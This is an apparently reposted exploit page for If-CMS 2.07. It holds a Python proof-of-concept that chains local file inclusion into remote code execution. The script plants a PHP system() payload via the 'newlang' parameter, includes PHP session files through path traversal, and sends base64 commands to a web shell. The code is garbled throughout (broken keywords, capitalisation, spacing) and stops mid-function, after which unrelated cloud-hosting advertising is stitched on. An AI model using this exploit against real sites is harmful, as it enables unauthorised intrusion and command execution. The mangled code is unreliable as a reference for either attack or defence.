If-CMS is a free and open-source content management system. If-CMS has a local file inclusion vulnerability, which may cause sensitive information leakage.
[+] Info:
~~~~~~~~~
If-CMS 2.07 Pre-Auth Local File transfer sion 0day Exploit
[+] Poc:
~~~~~~~~~
#! /Usr/bin/python
#~ INFORMATION
# Exploit Title: If-CMS 2.07 Pre-Auth Local File transfer sion 0day Exploit
# Author: TecR0c
# Date: 13/3/2011
# Software link: http://bit.ly/hh9ZB4
# Tested on: Linux bt
# Version: 2.07
# PHP. ini Settings: gpc_magic_quotes = Off
Import random, time, sys, urllib, urllib2, re, httplib, socket, base64, OS, getpass
From optparse import OptionParser
From urlparse import urlparse, urljoin
From urllib import urlopen
From cookielib import CookieJar
_ CONTACT _ = "TecR0c (tecr0c@tecninja.net )"
_ DATE _ = "13.3.2011"
Usage = Example: % s http: // localhost/ncms/-p 127.0.0.1: 8080% _ file __
Parser = OptionParser (usage = usage)
Parser. add_option ("-p", "-- proxy", type = "string", action = "store", dest = "proxy ",
Help = "HTTP Proxy <server >:< port> ")
(Options, args) = parser. parse_args ()
If options. proxy:
Print [+] Using Proxy + options. proxy
# User Agents
Agents = ["Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0 )",
"Internet Explorer 7 (Windows Vista); Mozilla/4.0 ",
"Google Chrome 0.2.149.29 (Windows XP )",
"Operators' 9.25 (Windows Vista )",
"Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1 )",
"Opera/8.00 (Windows NT 5.1; U; en)"]
Agent = random. choice (agents)
Traversal = ../../../../../../../../../../../..
SessionLocation =/var/lib/php5/
Def banner ():
If OS. name = "posix ":
OS. system ("clear ")
Else:
OS. system ("cls ")
Header =
| ---------------------------------------- |
| Exploit: If-CMS 2.07 LFI RCE
| Author: % s
| Date: % s
| ---------------------------------------- |
% (_ CONTACT __,__ DATE __)
For I in header:
Print "% s" % I,
Sys. stdout. flush ()
Time. sleep (0.005)
Def injectPayload ():
WebSiteUrl = url. geturl () + index. php? Newlang = <? Php; system (base64_decode ($ _ REQUEST [cmd]);?>
Try:
Opener. open (webSiteUrl)
Except t:
Print [-] Failed
Def proxyCheck ():
If options. proxy:
Try:
H2 = httplib. HTTPConnection (options. proxy)
H2.connect ()
Print "[+] Using Proxy Server:", options. proxy
Handle T (socket. timeout ):
Print "[-] Proxy Timed Out"
Pass
Sys. exit (1)
Failed T (NameError ):
Print "[-] Proxy Not Given"
Pass
Sys. exit (1)
Except t:
Print "[-] Proxy Failed"
Pass
Sys. exit (1)
Def getProxy ():
Try:
Proxy_handler = urllib2.ProxyHandler ({http: options. proxy })
Handle T (socket. timeout ):
Print "[-] Proxy Timed Out"
Sys. exit (1)
Return proxy_handler
Cj = CookieJar ()
If options. proxy:
Opener = urllib2.build _ opener (getProxy (), urllib2.HTTPCookieProcessor (cj ))
Else:
Opener = urllib2.build _ opener (urllib2.HTTPCookieProcessor (cj ))
Opener. addheaders = [(User-agent, agent)]
Def postRequestWebShell (encodedCommand ):
WebSiteUrl = url. geturl () +. shell. php
CommandToExecute = [
(Cmd, encodedCommand)]
Export data = urllib. urlencode (commandToExecute)
Try:
Response = opener. open (webSiteUrl, response data). read ()
Except t:
Print [-] Failed
Sys. exit ()
Return response
Def writeOutShell (encodedCommand ):
CookieString = str (cj)
CookieSearch = re. compile (r "PHPSESSID = (. *) f ")
Session_value = cookieSearch. search (cookieString)
If session_value:
Session_value = session_value.group (1)
Cj. clear ()
WebSiteUrl = url. geturl () + index. php? Cmd = + encodedCommand + & newlang = + traversal + sessionLocation + sess _ + session_value + % 00
Try:
& Nb
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
